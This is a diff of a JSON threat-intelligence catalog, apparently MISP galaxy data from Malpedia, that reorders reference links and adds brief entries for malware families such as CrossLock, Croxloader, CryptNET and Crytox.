+ "https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/",
"https://www.secrss.com/articles/24995",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg",
- "https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/",
- "https://securelist.com/transparent-tribe-part-1/98127/",
"https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://blog.yoroi.company/research/transparent-tribe-four-years-later",
+ "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/",
+ "https://s.tencent.com/research/report/669.html",
+ "https://www.4hou.com/posts/vLzM",
"https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf",
+ "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html",
+ "https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/",
+ "https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ",
+ "https://labs.k7computing.com/index.php/transparent-tribe-targets-educational-institution/",
"https://twitter.com/teamcymru_S2/status/1501955802025836546",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://securelist.com/transparent-tribe-part-1/98127/",
+ "https://blog.yoroi.company/research/transparent-tribe-four-years-later",
+ "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF",
+ "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html?m=1",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://twitter.com/teamcymru/status/1351228309632385027",
"https://anchorednarratives.substack.com/p/trouble-in-asia-and-the-middle-east",
"https://team-cymru.com/blog/2021/07/02/transparent-tribe-apt-infrastructure-mapping-2/",
- "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/",
- "https://twitter.com/teamcymru/status/1351228309632385027",
- "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg",
+ "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/",
"https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html",
- "https://www.4hou.com/posts/vLzM",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF",
- "https://securelist.com/transparent-tribe-part-2/98233/",
- "https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/",
- "https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ",
- "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
- "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/"
+ "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg",
+ "https://twitter.com/katechondic/status/1502206599166939137"
],
"synonyms": [
"SEEDOOR",
@@ -18684,11 +19836,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cring",
- "https://twitter.com/swisscom_csirt/status/1354052879158571008",
"https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Vulnerability-in-Fortigate-VPN-servers-is-exploited-in-Cring-ransomware-attacks-En.pdf",
+ "https://twitter.com/swisscom_csirt/status/1354052879158571008",
"https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728",
- "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html"
],
"synonyms": [],
"type": []
@@ -18696,25 +19848,38 @@
"uuid": "f5a19987-d0b6-4cc3-89ab-d4540f2e9744",
"value": "Cring"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosslock",
+ "https://twitter.com/1ZRR4H/status/1648232869809078273"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "505dc6be-56f3-49ca-be11-45b3e78a4ac2",
+ "value": "CrossLock"
+ },
{
"description": "According to FireEye, CROSSWALK is a skeletal, modular backdoor capable of system survey and adding modules in response to C&C replies.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk",
+ "https://www.youtube.com/watch?v=8x-pGlWpIYI",
+ "https://twitter.com/MrDanPerez/status/1159459082534825986",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
"https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/",
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
+ "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/",
+ "https://thehackernews.com/2021/01/researchers-disclose-undocumented.html",
+ "https://content.fireeye.com/apt-41/rpt-apt41/",
+ "https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
"https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
- "https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.youtube.com/watch?v=8x-pGlWpIYI",
- "https://thehackernews.com/2021/01/researchers-disclose-undocumented.html",
- "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/",
- "https://www.youtube.com/watch?v=FttiysUZmDw",
- "https://twitter.com/MrDanPerez/status/1159459082534825986",
- "https://content.fireeye.com/apt-41/rpt-apt41/"
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/"
],
"synonyms": [
"Motnug",
@@ -18726,13 +19891,26 @@
"uuid": "7ca7c08b-36fd-46b3-8b9e-a8b0d4743433",
"value": "CROSSWALK"
},
+ {
+ "description": "According to Trend Micro, this is a custom loader for win.cobalt_strike, used by Earth Longzhi (a subgroup of APT41).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.croxloader",
+ "https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "48d697ec-aa34-4d98-83e4-17b736d59a85",
+ "value": "Croxloader"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch",
- "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf"
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/"
],
"synonyms": [],
"type": []
@@ -18745,18 +19923,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl",
+ "https://unit42.paloaltonetworks.com/trigona-ransomware-update/",
"https://twitter.com/demonslay335/status/971164798376468481",
+ "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/",
"https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
+ "https://www.telekom.com/en/blog/group/article/lockdata-auction-631300",
+ "https://twitter.com/albertzsigovits/status/1217866089964679174",
+ "https://hackmag.com/security/ransomware-russian-style/",
"https://twitter.com/bartblaze/status/1305197264332369920",
"https://bartblaze.blogspot.com/2016/02/vipasana-ransomware-new-ransom-on-block.html",
- "https://twitter.com/albertzsigovits/status/1217866089964679174",
- "https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/",
- "https://hackmag.com/security/ransomware-russian-style/",
- "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
- "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/",
- "https://www.telekom.com/en/blog/group/article/lockdata-auction-631300",
"https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/",
"https://securelist.com/cis-ransomware/104452/"
],
"synonyms": [
@@ -18784,8 +19963,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/",
- "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/"
+ "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/"
],
"synonyms": [],
"type": []
@@ -18811,18 +19990,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot",
- "https://asec.ahnlab.com/en/26052/",
- "https://asec.ahnlab.com/en/31683/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.mandiant.com/resources/russian-targeting-gov-business",
- "https://experience.mandiant.com/trending-evil-2/p/1",
- "https://www.bleepingcomputer.com/news/security/malicious-kmspico-installers-steal-your-cryptocurrency-wallets/",
- "https://asec.ahnlab.com/en/24423/",
+ "https://research.openanalysis.net/cryptbot/botnet/yara/config/2023/03/16/cryptbot.html",
"https://redcanary.com/wp-content/uploads/2021/12/KMSPico-V5.pdf",
- "https://www.bleepingcomputer.com/news/security/revamped-cryptbot-malware-spread-by-pirated-software-sites/",
"https://asec.ahnlab.com/en/35981/",
+ "https://regmedia.co.uk/2023/04/28/handout_google_cryptbot_complaint.pdf",
+ "https://www.bleepingcomputer.com/news/security/malicious-kmspico-installers-steal-your-cryptocurrency-wallets/",
+ "https://www.bleepingcomputer.com/news/security/revamped-cryptbot-malware-spread-by-pirated-software-sites/",
+ "https://asec.ahnlab.com/en/31683/",
+ "https://asec.ahnlab.com/en/31802/",
+ "https://asec.ahnlab.com/en/24423/",
+ "https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/",
+ "https://blog.google/technology/safety-security/continuing-our-work-to-hold-cybercriminal-ecosystems-accountable/",
+ "https://experience.mandiant.com/trending-evil-2/p/1",
+ "https://fr3d.hk/blog/cryptbot-too-good-to-be-true",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://asec.ahnlab.com/en/26052/",
"https://www.gdatasoftware.com/blog/2020/02/35802-bitbucket-abused-as-malware-slinger",
- "https://fr3d.hk/blog/cryptbot-too-good-to-be-true"
+ "https://www.mandiant.com/resources/russian-targeting-gov-business",
+ "https://blogs.blackberry.com/en/2022/03/threat-thursday-cryptbot-infostealer"
],
"synonyms": [],
"type": []
@@ -18843,6 +20028,19 @@
"uuid": "972fbb7b-6945-42d8-ba88-a7b4e6fc1ad4",
"value": "CrypticConvo"
},
+ {
+ "description": "According to OALabs, this ransomware has the following features: \r\n* Files are encrypted with AES CBC using a generated 256 bit key and IV.\r\n* The generated AES keys are encrypted using a hard coded RSA key and appended to the encrypted files.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptnet",
+ "https://research.openanalysis.net/dotnet/cryptnet/ransomware/2023/04/20/cryptnet.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "99c468a2-c69f-4c9c-9941-0627052001b2",
+ "value": "CryptNET"
+ },
{
"description": "",
"meta": {
@@ -18858,21 +20056,36 @@
"uuid": "c6d09bb2-5673-4b2b-b2cb-5d14f2568189",
"value": "CryptoDarkRubix"
},
+ {
+ "description": "CryptoJoker is an open source ransomware written in C#.\r\nCryptoJoker uses a combination of a \"custom XOR\" encryption and RSA. A private public/private pair key is generated for every computer.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptojoker",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/plutocrypt-a-cryptojoker-ransomware-variant"
+ ],
+ "synonyms": [
+ "PlutoCrypt"
+ ],
+ "type": []
+ },
+ "uuid": "01cb8122-7a24-436f-85d3-d6a306800f10",
+ "value": "CryptoJoker"
+ },
{
"description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
"https://www.secureworks.com/research/threat-profiles/gold-evergreen",
- "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
+ "https://www.secureworks.com/research/cryptolocker-ransomware",
"https://sites.temple.edu/care/ci-rw-attacks/",
"http://www.secureworks.com/research/threat-profiles/gold-evergreen",
- "https://www.secureworks.com/research/cryptolocker-ransomware",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware"
],
"synonyms": [],
"type": []
@@ -18898,11 +20111,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix",
+ "https://www.bleepingcomputer.com/news/security/new-azer-cryptomix-ransomware-variant-released/",
+ "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
"https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/",
- "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/",
- "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/"
+ "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/"
],
"synonyms": [
+ "Azer",
"CryptFile2"
],
"type": []
@@ -18941,8 +20156,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield",
- "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/",
- "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/"
+ "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/",
+ "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/"
],
"synonyms": [],
"type": []
@@ -18968,9 +20183,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall",
- "https://sites.temple.edu/care/ci-rw-attacks/",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f"
+ "https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f",
+ "https://sites.temple.edu/care/ci-rw-attacks/"
],
"synonyms": [],
"type": []
@@ -18996,8 +20211,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress",
- "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/",
- "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html"
+ "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html",
+ "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/"
],
"synonyms": [],
"type": []
@@ -19023,8 +20238,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx",
- "https://www.sentinelone.com/blog/sophisticated-new-packer-identified-in-cryptxxx-ransomware-sample/",
- "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/"
+ "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/",
+ "https://www.sentinelone.com/blog/sophisticated-new-packer-identified-in-cryptxxx-ransomware-sample/"
],
"synonyms": [],
"type": []
@@ -19032,6 +20247,19 @@
"uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8",
"value": "CryptXXXX"
},
+ {
+ "description": "Ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crytox",
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c7fb0acb-018b-47eb-8555-5a0291e2505e",
+ "value": "Crytox"
+ },
{
"description": "",
"meta": {
@@ -19050,9 +20278,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ctb_locker",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://samvartaka.github.io/malware/2015/11/20/ctb-locker",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://samvartaka.github.io/malware/2015/11/20/ctb-locker"
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/"
],
"synonyms": [],
"type": []
@@ -19065,24 +20293,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba",
- "https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/",
- "https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group+-+on+a+roll.pdf",
- "https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-cuba-ransomware/",
- "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
- "https://www.it-connect.fr/le-ransomware-cuba-sen-prend-aux-serveurs-exchange/",
- "https://www.mandiant.com/resources/unc2596-cuba-ransomware",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis",
- "https://www.fortinet.com/blog/threat-research/ransomware-roundup-gwisin-kriptor-cuba-and-more",
- "https://www.ic3.gov/Media/News/2021/211203-2.pdf",
- "https://www.guidepointsecurity.com/blog/using-hindsight-to-close-a-cuba-cold-case/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware",
- "https://lab52.io/blog/cuba-ransomware-analysis/",
- "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/",
+ "https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group+-+on+a+roll.pdf",
"https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html",
- "https://blog.group-ib.com/hancitor-cuba-ransomware"
+ "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-cuba-ransomware/",
+ "https://lab52.io/blog/cuba-ransomware-analysis/",
+ "https://www.mandiant.com/resources/unc2596-cuba-ransomware",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware",
+ "https://www.ic3.gov/Media/News/2021/211203-2.pdf",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-335a-stopransomware-cuba-ransomware.pdf",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/",
+ "https://blog.group-ib.com/hancitor-cuba-ransomware",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-gwisin-kriptor-cuba-and-more",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf",
+ "https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html",
+ "https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis",
+ "https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/",
+ "https://www.guidepointsecurity.com/blog/using-hindsight-to-close-a-cuba-cold-case/",
+ "https://www.it-connect.fr/le-ransomware-cuba-sen-prend-aux-serveurs-exchange/"
],
"synonyms": [
"COLDDRAW"
@@ -19097,9 +20327,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe",
- "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal",
+ "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
"http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html",
- "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
+ "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal"
],
"synonyms": [],
"type": []
@@ -19125,10 +20355,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.curator",
- "https://shared-public-reports.s3.eu-west-1.amazonaws.com/Secrets_behind_the_mysterious_ever101_ransomware.pdf"
+ "https://shared-public-reports.s3.eu-west-1.amazonaws.com/Secrets_behind_the_mysterious_ever101_ransomware.pdf",
+ "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/",
+ "https://seguranca-informatica.pt/analysis-of-the-sunnyday-ransomware/"
],
"synonyms": [
- "Ever101"
+ "Ever101",
+ "SunnyDay"
],
"type": []
},
@@ -19153,9 +20386,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet",
- "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
"https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
"https://explore.group-ib.com/htct/hi-tech_crime_2018",
+ "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
"http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html"
],
"synonyms": [],
@@ -19169,20 +20402,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
+ "https://darknetdiaries.com/episode/110/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-essex",
+ "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
"https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
"https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt",
- "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/",
- "https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/",
- "http://www.secureworks.com/research/threat-profiles/gold-essex",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "https://darknetdiaries.com/episode/110/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
"https://www.secureworks.com/research/threat-profiles/gold-essex",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/"
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf"
],
"synonyms": [],
"type": []
@@ -19195,29 +20428,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate",
- "https://citizenlab.ca/2015/12/packrat-report/",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
- "https://blog.reversinglabs.com/blog/rats-in-the-library",
- "https://www.subexsecure.com/pdf/malware-reports/2021-05/cybergate-threat-report.pdf",
"https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
"https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://www.subexsecure.com/pdf/malware-reports/2021-05/cybergate-threat-report.pdf",
+ "https://citizenlab.ca/2015/12/packrat-report/",
+ "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns",
+ "https://sectrio.com/wp-content/uploads/2021/08/cybergate-threat-report.pdf",
"https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns"
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
],
"synonyms": [
